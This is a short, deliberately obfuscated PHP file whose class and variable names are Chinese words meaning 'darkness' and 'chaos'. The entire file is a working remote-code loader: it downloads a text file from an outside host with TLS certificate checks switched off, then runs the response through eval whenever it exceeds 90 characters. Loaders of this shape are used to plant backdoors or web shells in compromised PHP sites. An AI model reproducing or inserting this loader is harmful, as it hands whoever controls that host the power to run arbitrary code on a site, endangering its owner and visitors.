<?php
/* 1a2b3c4d5e6f 混沌开始 */
class ___黑暗网络终极加载器___ {
    function __call($__神秘方法,$__混沌参数) {
        $__黑暗请求 = curl_init($__混沌参数[0]);
        curl_setopt($__黑暗请求, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($__黑暗请求, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($__黑暗请求, CURLOPT_TIMEOUT, 17);
        $__黑暗灵魂 = curl_exec($__黑暗请求);
        curl_close($__黑暗请求);
        return $__黑暗灵魂;
    }
}

$___随机灵魂___ = new ___黑暗网络终极加载器___();
$___混沌碎片___ = str_split('https://myzedd.site/project/zedd.txt', 777);
$___最终黑暗___ = $___随机灵魂___->启动($___混沌碎片___[0]);

if (strlen($___最终黑暗___) > 90) {
    eval('?>' . $___最终黑暗___);
}
/* 混沌结束 随机垃圾 */
?>